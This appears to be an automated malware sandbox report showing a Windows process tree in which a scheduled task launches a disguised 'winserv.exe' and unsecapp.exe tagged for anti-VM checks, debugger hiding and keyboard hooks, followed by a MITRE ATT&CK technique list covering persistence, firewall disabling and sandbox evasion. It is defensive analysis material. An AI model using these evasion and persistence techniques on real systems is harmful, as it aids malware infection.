- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=2012 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:3168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=2344 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:3132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2132 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3836 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=3684 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=2016 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=4244 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=2592 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:3808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=5288 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:1300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=5444 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=5144 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=5344 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=2596 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=5288 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:3140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=4312 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=3732 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:2852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=4604 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:3000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=5404 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:320

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1100

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:860

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Checks processor information in registry
PID:2388

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2112

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4fc
1⤵
PID:1412

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1516

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1789556258-630220680-21132921381353330713-479708429-405764245-204392653-1673808170"
1⤵
PID:1616

C:\Windows\system32\taskeng.exe
taskeng.exe {B49AF096-88A2-4B36-9450-1A0C4717951E} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]
1⤵
PID:3436
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3488
- C:\Windows\SysWOW64\unsecapp.exe
  C:\Windows\SysWOW64\unsecapp.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3500
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3528
- C:\Windows\SysWOW64\unsecapp.exe
  C:\Windows\SysWOW64\unsecapp.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1984
- C:\Windows\SysWOW64\unsecapp.exe
  C:\Windows\SysWOW64\unsecapp.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3788
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3948
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3424
- C:\Windows\SysWOW64\unsecapp.exe
  C:\Windows\SysWOW64\unsecapp.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1944
- C:\Windows\SysWOW64\unsecapp.exe
  C:\Windows\SysWOW64\unsecapp.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3704
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3108
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1560
- C:\Windows\SysWOW64\unsecapp.exe
  C:\Windows\SysWOW64\unsecapp.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2876
- C:\Windows\SysWOW64\unsecapp.exe
  C:\Windows\SysWOW64\unsecapp.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1944
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3752
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2176
- C:\Windows\SysWOW64\unsecapp.exe
  C:\Windows\SysWOW64\unsecapp.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2112
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2516
- C:\Windows\SysWOW64\unsecapp.exe
  C:\Windows\SysWOW64\unsecapp.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2408

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-124961056716779864041497327028-752285852-11904316881239283528-513020413-1165563944"
1⤵
PID:3500

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-437892583927322581801119526-119833786-549355649474441566-1846385481-1322493051"
1⤵
PID:3824

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "96825447819235129911227450602-11059249361034821726677393472827750622-469912667"
1⤵
PID:4056

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2620179541937881053-317541193116363324471839736-12362492651126040568747549238"
1⤵
PID:296

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1056063768-1563027231-1188451149-181217296765951016-738718331156870840-1187398977"
1⤵
PID:1996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5897656681851129372905532907-440027055-13979981821087908722844525321-801965030"
1⤵
PID:3324

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "150153059113908289240557339415400026271618758533-9989125791894255982-1895727931"
1⤵
PID:3432

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1100129503-1063040935-21406795011537192317-1836834631-5226165932079775445-524644506"
1⤵
PID:1660

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1074634037-1456921924221272768110332078122755491214357027601798716154332560944"
1⤵
PID:3592

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "770787647-1136636228-114061378-7562157141205738198-73459203214213220161666761798"
1⤵
PID:3664

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1860827441-1565700475120120929-970613355-21238577891029120558-319927200148840374"
1⤵
PID:2420

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1139813497-14715705051433670122-15428016211186669247-10142368291822473310-229238599"
1⤵
PID:3760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-671025012-1507227666-16333942701293671592-1320708379-2073952875675269147-1205825938"
1⤵
PID:3944

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1972180202842678764940557462514657288-1030193626-211828594916399253121159047332"
1⤵
PID:3864

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1484452156372287356142724818519852528211735900746-1636419966962864185-1550195248"
1⤵
PID:4016

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1548785357-1507339658-1786973084-1105046506-1295957653-666740123607507512-263843615"
1⤵
PID:4076

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "6517976991404878391-237185920-1929290954-1188995405224046384-1683627837-721957688"
1⤵
PID:2620

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-20130683-773220203-1637951025-680937347937966020-500186616-1531665996-1362688821"
1⤵
PID:3092

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17743704542120231001330705855-1281245469-492001861-1203432781737540202867316711"
1⤵
PID:3148

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "906684870-593227431-703138598578857009-14756751072019979998-689183148-322990037"
1⤵
PID:1284

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "192849027120170637521496401539-966632875-12424911766268082381886452081931380619"
1⤵
PID:2016

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "204051916716529103771197848018-1924299075-1564084420-584696802-15977579772127323658"
1⤵
PID:1948

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3392

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3504

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3732

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Modifies registry class
PID:1784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Network Service Discovery

T1046

Query Registry

System Information Discovery